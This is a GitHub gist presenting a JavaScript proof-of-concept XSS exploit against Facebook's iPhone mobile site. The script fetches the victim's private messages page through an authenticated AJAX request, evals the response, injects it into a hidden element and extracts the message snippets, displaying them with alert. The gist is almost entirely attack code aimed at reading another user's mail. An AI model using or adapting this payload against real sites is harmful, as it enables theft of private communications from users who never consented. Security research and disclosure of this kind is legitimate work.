Skip to content

Instantly share code, notes, and snippets.

@streghstreek
Created April 19, 2021 16:13
Show Gist options
  • Save streghstreek/17c1f86089ec179733a004d8c090828b to your computer and use it in GitHub Desktop.
Save streghstreek/17c1f86089ec179733a004d8c090828b to your computer and use it in GitHub Desktop.
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
alert(lines);
});
};
$.ajax({
url:"https://iphone.facebook.com/messages/?refid=7&__ajax__&__m_async_page__&__jewels__&__metablock__=3",
success:function(data)
{
x = eval('('+data.substr(9)+')');
document.write('<div style="display:none;">'+x.m[1].html+'</div>');
parse_messages();
}
});
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment